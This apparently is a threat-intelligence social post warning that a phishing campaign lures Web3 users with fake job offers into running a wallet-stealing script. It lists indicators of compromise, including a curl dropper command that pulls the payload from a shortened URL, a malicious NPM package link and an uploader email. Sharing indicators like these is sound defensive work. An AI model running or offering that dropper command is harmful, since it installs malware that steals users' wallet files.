๐Ÿšจ Security TI Alert ๐Ÿšจ

According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.

๐Ÿ” Key IOCs:
๐Ÿ”ธGitLab repo: https://t.co/ivGN93PS4b
๐Ÿ”ธDropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

๐Ÿงช The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA

๐Ÿšจ We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
๐Ÿ”ธLikely linked GitHub: apollo-hero
๐Ÿ”ธUploader email: skelstar125@gmail.com

โš ๏ธ Do NOT install or run unknown packages or scripts. Always verify sources.

#LAZARUS #Phishing